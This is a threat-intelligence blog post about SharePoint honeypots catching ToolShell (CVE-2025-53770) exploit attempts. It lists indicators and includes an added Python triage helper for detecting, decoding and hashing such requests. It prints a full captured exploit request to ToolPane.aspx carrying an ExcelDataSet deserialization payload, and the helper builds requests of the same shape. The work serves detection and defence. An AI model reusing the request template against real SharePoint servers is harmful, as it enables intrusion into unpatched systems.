SharePoint Exploit Intelligence with Honeypots

Published on 27 July 2025
3 min read
SharePoint
Threat Intelligence
Exploit Detection

N‑Day SharePoint Exploit Intelligence with Honeypots

TL;DR

  • Within an hour of the July 20 advisory, we spun up 20 SharePoint-flavored honeypots across multiple regions.

  • Detected 91 attempts to exploit ToolShell in the first 48 hours; over 50% were marked “clean” on VT at the time of observation.

  • Observed attack chains consistent with public reporting: the spoofing/auth-bypass vulnerability followed by the RCE/deserialization half.

Backstory & Objective

On 2025‑07‑20 (EEST), CISA flagged active exploitation of new SharePoint vulnerabilities. We immediately deployed 20 high‑interaction honeypots to:

  • Validate exploit prevalence

  • See if we could extract indicators before they went public

  • Publish data from the experiment on Twitter / X.

Results

Interesting Hits (first 48h)

  • The first 24 hours contained mostly traffic that looked like vendors scanning for signs of exploitation, i.e. GET requests for the spinstall0.aspx path.

  • However, exploit traffic started hitting the honeypots just before a POC went public.

  • Altogether, we detected 91 attempts to exploit ToolShell in the first 48 hours.

Over 50% were marked “clean” on VT at the time of observation.


Beating the Public POC

Interestingly, the first exploit attempt hit one of the honeypots roughly 30 minutes before a public POC was put onto GitHub.


Exploits

While there was a good number of exploit attempts, most carried payloads intended for testing purposes, e.g.:

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
.... MSOTlPn_Uri=http%3a%2f%2flocalhost%2f_controltemplates%2f15%2fAclEditor.ascx&MSOTlPn_DWP=%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22Scorecard%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22asp%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%0a%3casp%3aUpdateProgress%20ID%3d%22UpdateProgress1%22%20DisplayAfter%3d%2210%22%20%0arunat%3d%22server%22%20AssociatedUpdatePanelID%3d%22upTest%22%3e%0a%3cProgressTemplate%3e%0a%20%20%3cdiv%20class%3d%22divWaiting%22%3e%20%20%20%20%20%20%20%20%20%20%20%20%0a%20%20%20%20%3cScorecard%3aExcelDataSet%20CompressedDataTable%3d%22%0d%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22Scorecard%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0d%0a%20%20%20%20%3c%25%40%20Register%20Tagprefix%3d%22asp%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0d%0a%0d%0a%3casp%3aUpdateProgress%20ID%3d%22UpdateProgress1%22%20DisplayAfter%3d%2210%22%20%0d%0arunat%3d%22server%22%20AssociatedUpdatePanelID%3d%22upTest%22%3e%0d%0a%3cProgressTemplate%3e%0d%0a%20%20%3cdiv%20class%3d%22divWaiting%22%3e%20%20%20%20%20%20%20%20%20%20%20%20%0d%0a%20%20%20%20%3cScorecard%3aExcelDataSet%20CompressedDataTable%3d%22H4sICPdrf2gAA21hcmtlci54bWwAhZJda8MgGIXv%2bytEFtgY1rSlFMR4UwYbrGzQsK%2b7t9E0shqD2qU%2ff5Kk61YGFcGb43OO75FLXZZbx%2foDDDqYXe2Z8RICZHjvauaLShnwxOjCWW%2fLQAprWNSRXoVH6Hz1kJ55CXJ0Jl8TLCKKl9aKDsk34NCQT8sM57DZ
KYx6V%2bZs%2b%2bSkivwUH1UV%2bGUF9Vb5DOvaKxeUxGLIxxtbDMkOXme4CqFhlLZtO25nY%2bu2dJqmE%2fq2elx3YUkkBKgL9eeBR4C8DPhxjt658uHVQdMoJ37h%2bENdWpFX2qO4AVXgzE55j5Yvd2SaTudkPlssUvRsl8iA%2b1RuzGl35zck1ybiwTTi6jrORiGyR7fJO0kMSWSe3LNkxZL1xw2nJ%2bUpGv0nG6dxWEMLNNbQFUO7Zjg9%2bzJi9A0tsNnlRQIAAA%3d%3d%22%20DataTable-CaseSensitive%3d%22false%22%20runat%3d%22server%22%3e%0a%3c%2fScorecard%3aExcelDataSet%3e%0a%20%20%3c%2fdiv%3e%0a%3c%2fProgressTemplate%3e%0a%3c%2fasp%3aUpdateProgress%3e%0a%20%20%20%20

Decoded, the CompressedDataTable blob translated to:

<diffgr:diffgram ...>
  <foo><bar ...>
    <poc>...<Info>This is a harmless CVE-2025-53770 PoC marker.</Info>...</poc>
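A small triage helper, added here as an example and not part of the original post or the operator's tooling, that shows how a defender can turn the two request shapes reported above into records: it labels GET probes for spinstall0.aspx as scanner traffic, labels POSTs to ToolPane.aspx with DisplayMode=Edit as ToolShell attempts, URL-decodes the MSOTlPn_DWP field, inflates the base64+gzip CompressedDataTable attribute (the "H4sI" prefix is the base64 form of the gzip magic bytes), and hashes the plaintext so payload variants can be tracked as indicators alongside the user agent and declared content length. The sample requests, the honeypot.example host, and the label names are constructed for the example; the paths, parameter names and harmless marker text come from the page.

```python
"""
Triage helper for the request shapes this page reports from the SharePoint
honeypots: GET probes for spinstall0.aspx, and ToolShell-style POSTs to
ToolPane.aspx?DisplayMode=Edit whose MSOTlPn_DWP field carries a
Scorecard:ExcelDataSet with a base64+gzip CompressedDataTable attribute.
Example code added to this page, not the honeypot operator's tooling; the
sample requests below are constructed, not captured traffic.
"""
import base64
import gzip
import hashlib
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

TOOLPANE_PATH = "/_layouts/15/toolpane.aspx"
PROBE_PATHS = {"/_layouts/15/spinstall0.aspx", "/_layouts/16/spinstall0.aspx"}
# gzip streams start with 1f 8b 08, which base64-encodes to "H4sI"; requiring
# it skips the outer CompressedDataTable="<nested page>" wrapper seen on the page
CDT_RE = re.compile(r'CompressedDataTable="\s*(H4sI[A-Za-z0-9+/=]+)"')


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path, "query": parse_qs(parts.query),
            "headers": headers, "body": body}


def classify(req: dict) -> str:
    """Label a request using the two traffic patterns described on the page."""
    path = req["path"].lower()
    if req["method"] == "GET" and path in PROBE_PATHS:
        return "scanner-probe"        # vendors/scanners checking for the dropped file
    if (req["method"] == "POST" and path == TOOLPANE_PATH
            and req["query"].get("DisplayMode", [""])[0] == "Edit"):
        return "toolshell-attempt"    # the ToolPane.aspx exploit path
    return "other"


def unpack_datatable(req: dict) -> Optional[dict]:
    """URL-decode MSOTlPn_DWP, inflate the CompressedDataTable blob and hash
    the plaintext so it can be tracked as a payload indicator."""
    dwp = parse_qs(req["body"]).get("MSOTlPn_DWP", [None])[0]
    if not dwp:
        return None
    match = CDT_RE.search(dwp)
    if not match:
        return None
    plain = gzip.decompress(base64.b64decode(match.group(1))).decode("utf-8", "replace")
    return {"sha256": hashlib.sha256(plain.encode()).hexdigest(),
            "harmless_marker": "harmless" in plain.lower(),
            "plaintext": plain}


def triage(raw: str) -> dict:
    """One record per request: label, user agent, declared length, decoded payload."""
    req = parse_request(raw)
    label = classify(req)
    record = {"label": label,
              "user_agent": req["headers"].get("user-agent", ""),
              "content_length": int(req["headers"].get("content-length", len(req["body"])))}
    if label == "toolshell-attempt":
        record["payload"] = unpack_datatable(req)
    return record


# --- constructed samples (not captured traffic) ---------------------------
SAMPLE_MARKER_XML = "<poc><Info>This is a harmless CVE-2025-53770 PoC marker.</Info></poc>"


def build_sample_request(inner_xml: str) -> str:
    """Build a POST in the shape shown on the page, carrying inner_xml as the
    gzip+base64 CompressedDataTable value (constructed test fixture)."""
    blob = base64.b64encode(gzip.compress(inner_xml.encode())).decode()
    dwp = ('<%@ Register Tagprefix="Scorecard" '
           'Namespace="Microsoft.PerformancePoint.Scorecards" '
           'Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, '
           'Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>\n'
           f'<Scorecard:ExcelDataSet CompressedDataTable="{blob}" '
           'DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>\n')
    body = urlencode({"MSOTlPn_Uri": "http://localhost/_controltemplates/15/AclEditor.ascx",
                      "MSOTlPn_DWP": dwp})
    return ("POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1\r\n"
            "Host: honeypot.example\r\n"
            "User-Agent: python-requests/2.31.0\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n" + body)


SAMPLE_PROBE = ("GET /_layouts/15/spinstall0.aspx HTTP/1.1\r\n"
                "Host: honeypot.example\r\n"
                "User-Agent: curl/8.1.2\r\n\r\n")

if __name__ == "__main__":
    for raw in (SAMPLE_PROBE, build_sample_request(SAMPLE_MARKER_XML)):
        print(triage(raw))
```

Running the module prints one record per sample: the curl probe is labelled scanner-probe with no payload, and the constructed POST is labelled toolshell-attempt with the marker XML recovered from the gzip blob. The plaintext hash, rather than the base64 string, is the value worth sharing, because re-compressing the same XML with a different gzip timestamp changes the blob but not the plaintext.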

Indicators

Observed IPs Targeting the Exploit Path:

Unique User-Agents:
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.3.17
  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0
  • curl/8.1.2
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15
  • Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
  • Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  • python-requests/2.31.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • curl/7.68.0
  • Mozilla/5.0 (SS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
  • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15

Varying Content Lengths:

516, 7699, 397, 1055, 1057, 1442, 1446, 1448, 1452, 2480, 561, 1456, 1468, 4962, 872, 373, 118, 119, 120, 1532

Limitations

This was an ad-hoc experiment standing up infrastructure rapidly into various public clouds. Results might be much more interesting with a longer-term deployment into less noisy infrastructure.

Closing

Honeypots gave a time advantage on credible indicators while public lists lagged, and provided payload IOCs before publicly known exploits were available.

Build Your Own Threat Intelligence

Deploy a SharePoint Decoy for Free.
